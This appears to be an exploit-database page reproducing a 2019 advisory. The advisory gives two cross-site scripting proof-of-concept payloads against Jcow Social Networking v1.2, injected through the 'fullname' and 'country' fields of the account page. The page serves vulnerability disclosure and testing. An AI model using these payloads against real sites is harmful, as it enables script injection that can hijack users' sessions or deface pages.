Advertisement






Jcow Social Networking - Multiple XSS Inj.

CVE Category Price Severity
N/A CWE-79 Varies High
Author Risk Exploitation Type Date
Unknown High Remote 2019-04-15
CPE
cpe:cpe:/a:jcow:social_networking_platform
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040118

Below is a copy:

Jcow Social Networking - Multiple XSS Inj.
===========================================================================================
# Exploit Title: Jcow Social Networking - 'fullname' XSS Inj.
# Dork: N/A
# Date: 13-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.jcow.net
# Software Link: https://sourceforge.net/projects/jcow/
# Version: v1.2
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Jcow makes it easy&interesting to create Social Networks and online communities.
===========================================================================================
# POC - XSS
# Parameters : fullname
# Attack Pattern : x%22+onmouseover%3dalert(0x0024A0)+x%3d%22 
# POST Method : http://localhost/jcowce12/index.php?p=account/index
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Jcow Social Networking - 'country' XSS Inj.
# Dork: N/A
# Date: 13-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.jcow.net
# Software Link: https://sourceforge.net/projects/jcow/
# Version: v1.2
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Jcow makes it easy&interesting to create Social Networks and online communities.
===========================================================================================
# POC - XSS
# Parameters : country
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x002692)</scRipt>
# POST Method : http://localhost/jcowce12/index.php?p=account/index
===========================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum